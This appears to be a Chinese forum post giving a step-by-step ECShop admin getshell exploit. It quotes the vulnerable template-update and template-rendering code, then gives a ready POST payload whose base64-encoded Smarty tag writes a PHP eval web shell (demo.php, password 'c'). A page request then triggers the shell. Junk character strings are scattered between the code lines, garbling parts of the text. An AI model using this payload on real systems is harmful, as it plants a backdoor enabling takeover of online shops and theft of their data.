Ecshop后台getshell

admin

首先 ecshop用的是smarty 这样就可以通过它的fetch函数来执行模板

而模板里面可以执行他定义的php代码，这样只要可以写出模板 然后找到调用就可以拿到shell了
但是ecshop似乎不支持{php}{/php}这个标签来执行php代码
admin/template.php

1 if ($_REQUEST['act'] == 'update_library')

5 C; n4 m* W& L; E8 W2   

3 {
* b8 p  x7 o; B
4     check_authz_json('library_manage');

) W1 D% S# V4 O* K( ?5   
& Z$ m3 G' ]: M% |6 |
6     $html = stripslashes(json_str_iconv($_POST['html']));

2 ~* A2 K5 K6 Z- L7 ?7   

8     $lib_file = '../themes/' . $_CFG['template'] . '/library/' .$_POST['lib'] . '.lbi'; //模板文件

9   

" ]/ _5 Q6 k3 ~' T$ Q5 S9 q10     $lib_file = str_replace("0xa", '', $lib_file); // 过滤 0xa 非法字符

1 k6 i" y. u) ?: K, N' W6 |11   

% ^( t) S! X4 i12     $org_html = str_replace("\xEF\xBB\xBF", '',file_get_contents($lib_file));

1 S: e/ ]' E# i1 {7 D/ [) K13   
7 L, O+ f# s, u3 v& z& V; }
14     if (@file_exists($lib_file) === true && @file_put_contents($lib_file,$html))//写出
( d% l! @8 e9 `- R
7 e% Y. }, V) ?: p- D7 e( \. k15     {

16         @file_put_contents('../temp/backup/library/' . $_CFG['template'] .'-' . $_POST['lib'] . '.lbi', $org_html);
9 l% }  M4 `' _3 L. W" X4 m
17         make_json_result('', $_LANG['update_lib_success']);
/ w) t( y3 U4 i9 F
1 N+ r7 _& X, f: Y4 z) y18     }

19     else
) o8 S) E1 [, o" \
) A9 n  N4 o' T6 Q$ B20     {
- e+ t9 t; K7 q; P
21         make_json_error(sprintf($_LANG['update_lib_failed'], 'themes/' .$_CFG['template'] . '/library'));
/ s4 J' {/ q. ^# r
22     }

. p# r+ X- }  F; F23 }

" l1 `- V0 {4 k# a8 p那么找个比较方便调用了模板的文件
+ s9 n+ Y' N3 ]) L, j5 e0 Aindex.php
& j, e# r' B5 w0 ^
1 if ($act == 'cat_rec')

2   
/ B+ I, C+ _1 V- f* V6 l. t
: c) W. O) y: C1 M3 {

- v; u8 V5 W! }) v- L7 [9 I4   

# R( N! d! v$ [8 v( Q5     $rec_array = array(1 => 'best', 2 => 'new', 3 => 'hot');
7 o- f# a( i* c" q6 q
/ G  b/ J4 j, P" j" n1 ]7 W0 k6   

7     $rec_type = !empty($_REQUEST['rec_type']) ?intval($_REQUEST['rec_type']) : '1';
8 C* C& G: Q; c6 c) ^1 B
* n, l0 Q* `( y# i& _8   
9 d  Y& J7 w  |& P1 }$ Z- ~( Q6 |
' V# A# x+ ]! |+ B9     $cat_id = !empty($_REQUEST['cid']) ? intval($_REQUEST['cid']) : '0';
- T9 {- H5 T/ C" ]# ^# E
10   

$ y$ u: a* r3 a- n1 y8 u5 N11     include_once('includes/cls_json.php');

2 d! [6 k: A7 U- {12   

13     $json = new JSON;
6 f! h' Z! _! T$ h7 {- p
14   

15     $result   = array('error' => 0, 'content' => '', 'type' => $rec_type,'cat_id' => $cat_id);

16   

17     $children = get_children($cat_id);
/ j  K3 |7 n) T& U7 _+ J& C
* ?3 _& Q9 `. d6 H# G18   
' U* `5 H7 D' U+ ]! @/ E/ R
19     $smarty->assign($rec_array[$rec_type] . '_goods',      get_category_recommend_goods($rec_array[$rec_type], $children));    // 推荐商品

20   
# w& w9 Y* e! Z
' D3 M5 g$ N$ }: W! U1 U7 T5 y21     $smarty->assign('cat_rec_sign', 1);
; H) c- G. }$ i5 T& v+ |
22   
# c/ Z" F$ l9 ^2 \" a1 i# U- _  {
23     $result['content'] = $smarty->fetch('library/recommend_' .$rec_array[$rec_type] . '.lbi');//使用了模板文件 该模板文件为recommend_best
3 ?- Z: p' U2 c1 \
24   
0 m. S/ O( u6 a4 V% H
  a9 O- c) n* R/ ~2 S25         echo 'library/recommend_' . $rec_array[$rec_type] . '.lbi';

& S( R1 r7 `; J( H+ |* f0 J( t26   
) R4 Z) k7 ^3 r; Q7 Y6 I. j: \
) d, l% H, S. ]7 X" e27         echo $rec_array[$rec_type];
4 B! K6 A# G5 O' w7 g9 R6 ^
28   
( S6 L9 z" C) ]& ~
29     die($json->encode($result));
7 Y" H1 F/ ]- @9 h6 d+ |, A
30   
9 h! L! r/ e- c5 h  i  H% [7 v
: o( d/ z* \6 [  O31 }

+ M/ P+ j0 w; j" ~- @# J- n: U* ?那么就有利用方法了
post包到http://localhost/ec/admin/template.php?act=update_library
7 H2 e6 n3 W" k0 V  l% vPost内容：
$ o/ [6 Y5 b: T2 x
$ p7 R6 H. g3 m1 J0 U​
1 lib=recommend_best&html={iffputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}16086{/if}

然后访问http://localhost/ec/index.php?act=cat_rec
" Z, K# S, e6 M- Z4 Y9 i
8 U5 P: ?* H! Q# H: G& a; Y+ @shel地址：http://localhost/ec/demo.php
9 B* V6 G7 k0 g' p密码c

& j# g1 g& o% @. i1 H& [& D